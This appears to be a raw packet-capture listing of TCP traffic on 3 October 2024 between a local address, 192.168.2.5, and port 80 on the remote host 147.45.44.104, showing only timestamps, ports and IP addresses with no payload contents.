                                                                                                                                Oct 3, 2024 15:07:05.977803946 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.979140043 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.979162931 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.979177952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.979216099 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.979216099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.979231119 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.979262114 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.981749058 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.981766939 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.981779099 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.981806040 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.981837034 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.066729069 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066747904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066756964 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066811085 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066819906 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066836119 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.066891909 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.066920042 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066930056 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066939116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.066975117 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.066991091 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067140102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067193031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067200899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067239046 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067270041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067277908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067316055 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067348957 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067403078 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067473888 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067485094 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067495108 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067503929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067514896 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067524910 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067572117 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067856073 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067904949 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.067928076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067936897 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067941904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.067996979 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.068128109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068172932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068173885 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.068182945 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068192959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068234921 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.068413973 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068455935 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068463087 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.068468094 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068486929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068495989 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.068516016 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.068543911 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.073961020 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074001074 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074009895 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074064016 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.074079037 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074088097 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074098110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074127913 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.074174881 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.074218035 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074228048 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074235916 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074266911 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.074274063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074285030 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074294090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074304104 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.074321985 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.074359894 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.113893032 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.113909960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.113919973 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.113930941 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.113960981 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.113993883 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.156940937 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.156951904 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.156976938 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.156986952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157027960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157037973 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157228947 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157239914 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157249928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157289028 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157325029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157354116 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157373905 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157380104 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157392025 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157433033 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157519102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157598972 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157609940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157644987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157655954 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157668114 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157677889 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157712936 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157744884 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.157910109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157927990 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157938957 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.157982111 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158035040 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158046007 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158056974 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158067942 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158092022 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158133030 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158384085 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158400059 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158411026 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158438921 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158473015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158512115 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158523083 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158533096 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158545017 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158555984 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158564091 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158596992 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.158941984 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158983946 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158993959 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.158996105 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.159041882 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.159071922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.159082890 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.159094095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.159104109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.159116030 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.159353971 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.161282063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161292076 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161300898 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161317110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161328077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161360025 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.161386967 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.161402941 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161415100 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161453009 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.161704063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161715031 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161725044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161750078 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161763906 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.161787987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.161823034 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.162139893 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162151098 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162162066 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162189960 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162189960 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.162214041 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.162296057 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162307024 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162317038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.162362099 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.162385941 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.171178102 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171186924 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171195984 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171236038 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171245098 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171253920 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171274900 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.171299934 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.171338081 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171348095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171356916 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171401024 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.171425104 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171435118 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.171485901 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.201536894 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201548100 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201559067 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201601982 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201611996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201625109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201627016 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.201637030 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.201673031 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.201711893 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.206749916 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244379044 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244467974 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244467974 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244484901 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244497061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244508028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244533062 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244540930 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244544983 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244600058 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244633913 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244645119 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244649887 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244694948 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244710922 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244719982 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244757891 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244777918 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244788885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244798899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244810104 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244821072 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244852066 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244862080 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.244863987 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.244904041 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.245376110 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.245385885 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.245429993 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.247242928 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247272015 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247281075 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247296095 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.247334003 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.247354984 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247365952 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247378111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247416973 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247427940 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247431040 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.247438908 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.247469902 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.247486115 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.248743057 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249093056 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249102116 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249140978 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249152899 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249162912 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249169111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249178886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249212027 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249227047 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249257088 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249267101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249274015 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249311924 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249391079 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249403000 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249413013 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249437094 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249444962 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249491930 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249499083 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249502897 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249516010 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249526978 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249538898 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249562025 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249572992 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249577999 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249608994 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249622107 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249666929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249676943 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249708891 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.249727011 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249738932 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.249768972 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.250828028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250838041 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250849009 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250864029 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250874996 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250879049 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.250885010 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250901937 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.250916958 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250927925 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250938892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250950098 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250952005 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.250962019 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250971079 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.250978947 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.250984907 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251010895 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251048088 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251077890 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251089096 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251100063 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251110077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251120090 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251148939 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:06.251168013 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251179934 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251185894 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:06.251224041 CEST8049704147.45.44.104192.168.2.5
